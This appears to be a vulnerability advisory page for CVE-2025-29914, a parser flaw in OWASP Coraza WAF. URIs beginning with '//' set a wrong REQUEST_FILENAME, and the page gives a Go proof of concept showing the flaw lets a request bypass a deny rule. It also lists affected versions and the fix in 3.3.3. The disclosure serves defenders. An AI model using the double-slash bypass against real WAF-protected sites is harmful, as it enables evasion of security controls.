medium
5.4
CWE
706
EPSS
0.038%
Advisory Published
Advisory Published
Updated

CVE-2025-29914: OWASP Coraza WAF has parser confusion which leads to wrong URI in `REQUEST_FILENAME`

First published: Thu Mar 20 2025(Updated: )

### Summary URLs starting with `//` are not parsed properly, and the request `REQUEST_FILENAME` variable contains a wrong value, leading to potential rules bypass. ### Details If a request is made on an URI starting with `//`, coraza will set a wrong value in `REQUEST_FILENAME`. For example, if the URI `//bar/uploads/foo.php?a=b` is passed to coraza: , `REQUEST_FILENAME` will be set to `/uploads/foo.php`. The root cause is the usage of `url.Parse` to parse the URI in [ProcessURI](https://github.com/corazawaf/coraza/blob/8b612f4e6e18c606e371110227bc7669dc714cab/internal/corazawaf/transaction.go#L768). `url.Parse` can parse both absolute URLs (starting with a scheme) or relative ones (just the path). `//bar/uploads/foo.php` is a valid absolute URI (the scheme is empty), `url.Parse` will consider `bar` as the host and the path will be set to `/uploads/foo.php`. ### PoC ```go package main import ( "fmt" "net/url" "os" "github.com/corazawaf/coraza/v3" ) const testRule = ` SecDebugLogLevel 9 SecDebugLog /dev/stdout SecRule REQUEST_FILENAME "@rx /bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny" ` func main() { var testURL = "//bar/uploads/foo.php" if os.Getenv("TEST_URL") != "" { testURL = os.Getenv("TEST_URL") } fmt.Printf("Testing URL: %s\n", testURL) config := coraza.NewWAFConfig().WithDirectives(testRule) waf, err := coraza.NewWAF(config) if err != nil { panic(err) } tx := waf.NewTransaction() tx.ProcessURI(testURL, "GET", "HTTP/1.1") in := tx.ProcessRequestHeaders() if in != nil { fmt.Printf("%+v\n", in) } } ``` ### Impact Potential bypass of rules using `REQUEST_FILENAME`.

Credit: security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
go/github.com/corazawaf/coraza/v3<3.3.3
3.3.3
go/github.com/jptosso/coraza-waf<3.3.3
3.3.3
Coraza<3.3.3

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2025-29914?

    CVE-2025-29914 has a medium severity level due to incorrect handling of specific URI patterns.

  • How do I fix CVE-2025-29914?

    To fix CVE-2025-29914, update OWASP Coraza WAF to version 3.3.3 or later.

  • What impact does CVE-2025-29914 have on web applications?

    CVE-2025-29914 can lead to incorrect values in the REQUEST_FILENAME, potentially affecting security and request handling.

  • What versions of OWASP Coraza WAF are affected by CVE-2025-29914?

    CVE-2025-29914 affects all versions of OWASP Coraza WAF prior to version 3.3.3.

  • Is there a workaround for CVE-2025-29914 if I cannot update?

    Currently, there are no recommended workarounds for CVE-2025-29914 other than upgrading to the fixed version.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203